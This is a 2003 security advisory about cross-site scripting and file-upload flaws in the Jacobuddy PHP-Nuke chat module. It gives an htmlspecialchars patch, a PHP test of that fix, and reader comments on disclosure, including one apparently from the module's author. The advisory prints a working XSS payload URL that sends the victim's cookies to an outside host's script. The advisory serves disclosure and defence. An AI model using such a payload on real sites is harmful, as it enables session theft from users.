phpnuked: Advisories!: Sourceforge Jacobuddy Cross Site Scripting (XSS) And Upload Exploit
PHP-Nuke
Jacobuddy, a JavaScript real-time chat module, is an independent add-on for the open source GNU/GPL content management system PHP-Nuke. Computer Cops has discovered that Jacobuddy version 3.0 is vulnerable to Cross Site Scripting (XSS) and file system manipulation. It is our belief that the author should be contacted prior to a public posting, but in this case we have supplied a fix for both vulnerabilities of this add-on.

The following URL is a sample of how Jacobuddy can be seeded with an XSS exploit within the message body:

http://www.laudanski.com/"style="background-image:url(javascript:nurl='http://www.laudanski.com/j.cgi?';nurl=nurl+document.cookie;document.URL=nurl)

The current unpatched version will automatically redirect the receiver's pop-up Jacobuddy message to another site, which grabs their cookie information from the attacked site.

The patch for this is applied to the buddy.php file:

In the following function block:

function send($to, $to_userid, $message, $subject) {

Add the following line after the global statement:

$message = htmlspecialchars(strip_tags($message));
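
An added illustration of why this one-line fix stops the attribute breakout shown above, and where its limit lies (not code from Jacobuddy or from the original advisory). render_link() is a hypothetical stand-in for markup that places a URL from the message inside a quoted attribute, and both inputs are constructed and harmless.

```php
<?php
// Added illustration, not Jacobuddy code. render_link() is a hypothetical
// stand-in for markup that places a URL from the message inside an attribute.
function render_link(string $message, string $q): string {
    return preg_replace_callback('~https?://\S+~', function ($m) use ($q) {
        return '<a href=' . $q . $m[0] . $q . '>link</a>';
    }, $message);
}

// The advisory's one-line fix. ENT_COMPAT is spelled out because it was the
// default until PHP 8.1; it escapes " but leaves ' alone.
function fix_from_advisory(string $message): string {
    return htmlspecialchars(strip_tags($message), ENT_COMPAT);
}

// Same fix with ENT_QUOTES, which also escapes single quotes.
function fix_with_ent_quotes(string $message): string {
    return htmlspecialchars(strip_tags($message), ENT_QUOTES);
}

// A browser ends the attribute at the first matching quote. The URL is
// contained only if the whole of it is still inside the href value.
function url_contained(string $html, string $url, string $q): bool {
    if (!preg_match('~href=' . $q . '([^' . $q . ']*)' . $q . '~', $html, $m)) {
        return false;
    }
    return html_entity_decode($m[1], ENT_QUOTES) === $url;
}

// Constructed, harmless inputs: a quote followed by an extra attribute.
$dq = 'http://example.test/"style="color:red';
$sq = "http://example.test/'style='color:red";

$cases = [
    ['unpatched, href="..."',      $dq, $dq,                      '"'],
    ['advisory fix, href="..."',   $dq, fix_from_advisory($dq),   '"'],
    ["advisory fix, href='...'",   $sq, fix_from_advisory($sq),   "'"],
    ["ENT_QUOTES fix, href='...'", $sq, fix_with_ent_quotes($sq), "'"],
];
foreach ($cases as [$label, $url, $stored, $q]) {
    $html = render_link($stored, $q);
    printf("%-28s %s\n", $label, url_contained($html, $url, $q) ? 'contained' : 'BROKE OUT');
}
```

If any markup around the message uses single-quoted attributes, pass ENT_QUOTES explicitly rather than relying on the default flags of the PHP version in use.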

The next vulnerability is the infamous dcc file transfer within the buddy.php file.

Any file uploaded into the system can stay on the system. A malicious script can be generated to grab vital file system data, such as the PHP-Nuke config.php file, and turn it into a text file for the malicious uploader to access. Computer Cops highly advises that the entire dcc function be removed from the file, in addition to the dcc case block and the $who_online clause for the dcc link.

Computer Cops will make an attempt to contact the vendor with this information.
Posted on Saturday, 01 March 2003 @ 23:39:55 EST by Paul

Re: Jacobuddy Cross Site Scripting (XSS) And Upload Exploit (Score: 1)
by Paul  on Saturday, 01 March 2003 @ 23:58:46 EST
Author has been emailed.



Re: Sourceforge Jacobuddy Cross Site Scripting (XSS) And Upload Exploit (Score: 0)
by Anonymous  on Monday, 03 March 2003 @ 03:05:13 EST
I thought this was reposted news, but when I saw it was generated from here, your "post fix first, tell vendor later" policy puzzled me. You took the time to write a nice little article, you've got a good patch I assume you developed, all that good work, so I didn't understand why you decided to wait to notify the developer.

Program developers deserve the courtesy of first alert so they can tell or provide a patch to their userbase directly or from their site asap. It's not like you needed to wait for them to get a patch out afterwards since you have a solution here too, that's true enough. But heh, do things in the right order. At the least, developers just don't appreciate not being told first.

I figure this wasn't for simple credit and more visitors, you seem to me to be one of the good guys. I figure you thought it was just a good idea at the time for the users to get it right out. Heh, I like your site, ComputerCops is excellent. I just don't want to see it gain ANY kind of bad rep, not that it'd turn into an early alert cracker resource or anything. Great site. Keep up the good work.

Btw the site looks terrific too. You might check the hrefs in your nav tags though. Some seem to be messed up with double values and wind up at the error page.



Re: Sourceforge Jacobuddy Cross Site Scripting (XSS) And Upload Exploit (Score: 0)
by Anonymous  on Monday, 03 March 2003 @ 06:00:37 EST
I'm Jacobuddy's author. Thanks for your warning and also for your patch.
Jacobuddy is an open-source project and any contributions are welcome. Now I'll patch the new version with your fix if you agree.
Now I have a request: I'd like to keep the Jacobuddy development centralized, so Jacobuddy has a CVS on SourceForge, and I'll be very happy if someone would help me to develop this project, so we can do better work and avoid these security bugs.

Thanks for your courtesy
Fabio